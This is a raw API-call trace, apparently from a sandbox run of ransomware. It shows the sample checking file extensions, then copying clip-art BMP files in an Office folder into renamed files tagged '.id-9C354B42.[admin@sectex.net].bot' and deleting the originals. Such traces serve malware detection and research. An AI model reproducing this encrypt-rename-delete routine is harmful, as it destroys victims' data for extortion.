	[0154.877] lstrlenW (lpString=".xlsx") returned 5
	[0154.877] lstrcmpiW (lpString1=".xlsx", lpString2="8.BMP") returned -1
	[0154.877] lstrlenW (lpString=".ppt") returned 4
	[0154.877] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.877] lstrlenW (lpString=".zip") returned 4
	[0154.877] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString=".rar") returned 4
	[0154.877] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString=".bz2") returned 4
	[0154.877] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString=".7z") returned 3
	[0154.877] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.877] lstrlenW (lpString=".dbf") returned 4
	[0154.877] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.877] lstrlenW (lpString=".1cd") returned 4
	[0154.877] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.877] lstrlenW (lpString=".jpg") returned 4
	[0154.877] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.877] lstrlenW (lpString=".doc") returned 4
	[0154.877] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString=".docx") returned 5
	[0154.878] lstrcmpiW (lpString1=".docx", lpString2="8.BMP") returned -1
	[0154.878] lstrlenW (lpString=".pdf") returned 4
	[0154.878] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.878] lstrlenW (lpString=".xls") returned 4
	[0154.878] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.878] lstrlenW (lpString=".xlsx") returned 5
	[0154.878] lstrcmpiW (lpString1=".xlsx", lpString2="8.BMP") returned -1
	[0154.878] lstrlenW (lpString=".ppt") returned 4
	[0154.878] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.878] lstrlenW (lpString=".zip") returned 4
	[0154.878] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.878] lstrlenW (lpString=".rar") returned 4
	[0154.878] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.878] lstrlenW (lpString=".bz2") returned 4
	[0154.878] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.878] lstrlenW (lpString=".7z") returned 3
	[0154.878] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.878] lstrlenW (lpString=".dbf") returned 4
	[0154.878] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.878] lstrlenW (lpString=".1cd") returned 4
	[0154.878] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.878] lstrlenW (lpString=".jpg") returned 4
	[0154.878] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.878] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.879] lstrlenW (lpString="J0101859.BMP") returned 12
	[0154.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.879] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=31968) returned 1
	[0154.879] CloseHandle (hObject=0x3cc) returned 1
	[0154.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp")) returned 0x20
	[0154.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.880] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.880] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.880] GetLastError () returned 0x0
	[0154.880] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7ce0, lpOverlapped=0x0) returned 1
	[0154.882] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7cf0, lpOverlapped=0x0) returned 1
	[0154.884] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.884] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.884] SetEndOfFile (hFile=0x3b4) returned 1
	[0154.884] CloseHandle (hObject=0x3b4) returned 1
	[0154.884] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.884] SetEndOfFile (hFile=0x3cc) returned 1
	[0154.887] CloseHandle (hObject=0x3cc) returned 1
	[0154.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp")) returned 1
	[0154.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.888] lstrlenW (lpString=".doc") returned 4
	[0154.888] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.888] lstrlenW (lpString=".docx") returned 5
	[0154.888] lstrcmpiW (lpString1=".docx", lpString2="9.BMP") returned -1
	[0154.888] lstrlenW (lpString=".pdf") returned 4
	[0154.888] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.888] lstrlenW (lpString=".xls") returned 4
	[0154.888] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.888] lstrlenW (lpString=".xlsx") returned 5
	[0154.888] lstrcmpiW (lpString1=".xlsx", lpString2="9.BMP") returned -1
	[0154.888] lstrlenW (lpString=".ppt") returned 4
	[0154.888] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.888] lstrlenW (lpString=".zip") returned 4
	[0154.888] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.888] lstrlenW (lpString=".rar") returned 4
	[0154.888] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.888] lstrlenW (lpString=".bz2") returned 4
	[0154.888] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.888] lstrlenW (lpString=".7z") returned 3
	[0154.888] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.888] lstrlenW (lpString=".dbf") returned 4
	[0154.888] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.889] lstrlenW (lpString=".1cd") returned 4
	[0154.889] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.889] lstrlenW (lpString=".jpg") returned 4
	[0154.889] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.889] lstrlenW (lpString=".doc") returned 4
	[0154.889] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString=".docx") returned 5
	[0154.889] lstrcmpiW (lpString1=".docx", lpString2="9.BMP") returned -1
	[0154.889] lstrlenW (lpString=".pdf") returned 4
	[0154.889] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString=".xls") returned 4
	[0154.889] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString=".xlsx") returned 5
	[0154.889] lstrcmpiW (lpString1=".xlsx", lpString2="9.BMP") returned -1
	[0154.889] lstrlenW (lpString=".ppt") returned 4
	[0154.889] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.889] lstrlenW (lpString=".zip") returned 4
	[0154.889] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString=".rar") returned 4
	[0154.889] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString=".bz2") returned 4
	[0154.889] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.889] lstrlenW (lpString=".7z") returned 3
	[0154.889] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.889] lstrlenW (lpString=".dbf") returned 4
	[0154.890] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.890] lstrlenW (lpString=".1cd") returned 4
	[0154.890] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63
	[0154.890] lstrlenW (lpString=".jpg") returned 4
	[0154.890] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.890] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.890] lstrlenW (lpString="J0101860.BMP") returned 12
	[0154.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.890] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32184) returned 1
	[0154.890] CloseHandle (hObject=0x3cc) returned 1
	[0154.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp")) returned 0x20
	[0154.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.891] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.891] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.893] GetLastError () returned 0x0
	[0154.893] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7db8, lpOverlapped=0x0) returned 1
	[0154.897] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0154.898] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.898] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.898] SetEndOfFile (hFile=0x3b4) returned 1
	[0154.898] CloseHandle (hObject=0x3b4) returned 1
	[0154.899] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.899] SetEndOfFile (hFile=0x3cc) returned 1
	[0154.901] CloseHandle (hObject=0x3cc) returned 1
	[0154.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp")) returned 1
	[0154.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.902] lstrlenW (lpString=".doc") returned 4
	[0154.902] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.902] lstrlenW (lpString=".docx") returned 5
	[0154.902] lstrcmpiW (lpString1=".docx", lpString2="0.BMP") returned -1
	[0154.902] lstrlenW (lpString=".pdf") returned 4
	[0154.902] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.902] lstrlenW (lpString=".xls") returned 4
	[0154.902] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.902] lstrlenW (lpString=".xlsx") returned 5
	[0154.902] lstrcmpiW (lpString1=".xlsx", lpString2="0.BMP") returned -1
	[0154.902] lstrlenW (lpString=".ppt") returned 4
	[0154.902] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.903] lstrlenW (lpString=".zip") returned 4
	[0154.903] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString=".rar") returned 4
	[0154.903] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString=".bz2") returned 4
	[0154.903] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString=".7z") returned 3
	[0154.903] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.903] lstrlenW (lpString=".dbf") returned 4
	[0154.903] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.903] lstrlenW (lpString=".1cd") returned 4
	[0154.903] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.903] lstrlenW (lpString=".jpg") returned 4
	[0154.903] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.903] lstrlenW (lpString=".doc") returned 4
	[0154.903] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString=".docx") returned 5
	[0154.903] lstrcmpiW (lpString1=".docx", lpString2="0.BMP") returned -1
	[0154.903] lstrlenW (lpString=".pdf") returned 4
	[0154.903] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString=".xls") returned 4
	[0154.903] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.903] lstrlenW (lpString=".xlsx") returned 5
	[0154.903] lstrcmpiW (lpString1=".xlsx", lpString2="0.BMP") returned -1
	[0154.903] lstrlenW (lpString=".ppt") returned 4
	[0154.904] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.904] lstrlenW (lpString=".zip") returned 4
	[0154.904] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.904] lstrlenW (lpString=".rar") returned 4
	[0154.904] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.904] lstrlenW (lpString=".bz2") returned 4
	[0154.904] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.904] lstrlenW (lpString=".7z") returned 3
	[0154.904] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.904] lstrlenW (lpString=".dbf") returned 4
	[0154.904] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.904] lstrlenW (lpString=".1cd") returned 4
	[0154.904] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 63
	[0154.904] lstrlenW (lpString=".jpg") returned 4
	[0154.904] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.904] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.904] lstrlenW (lpString="J0101861.BMP") returned 12
	[0154.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.906] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32184) returned 1
	[0154.906] CloseHandle (hObject=0x3b4) returned 1
	[0154.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp")) returned 0x20
	[0154.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.906] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.906] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0154.909] GetLastError () returned 0x0
	[0154.909] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7db8, lpOverlapped=0x0) returned 1
	[0154.911] WriteFile (in: hFile=0x298, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0154.912] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.912] WriteFile (in: hFile=0x298, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.912] SetEndOfFile (hFile=0x298) returned 1
	[0154.912] CloseHandle (hObject=0x298) returned 1
	[0154.913] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.913] SetEndOfFile (hFile=0x3b4) returned 1
	[0154.917] CloseHandle (hObject=0x3b4) returned 1
	[0154.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.917] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp")) returned 1
	[0154.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.918] lstrlenW (lpString=".doc") returned 4
	[0154.918] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.918] lstrlenW (lpString=".docx") returned 5
	[0154.918] lstrcmpiW (lpString1=".docx", lpString2="1.BMP") returned -1
	[0154.918] lstrlenW (lpString=".pdf") returned 4
	[0154.918] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.918] lstrlenW (lpString=".xls") returned 4
	[0154.918] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.918] lstrlenW (lpString=".xlsx") returned 5
	[0154.918] lstrcmpiW (lpString1=".xlsx", lpString2="1.BMP") returned -1
	[0154.918] lstrlenW (lpString=".ppt") returned 4
	[0154.918] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.918] lstrlenW (lpString=".zip") returned 4
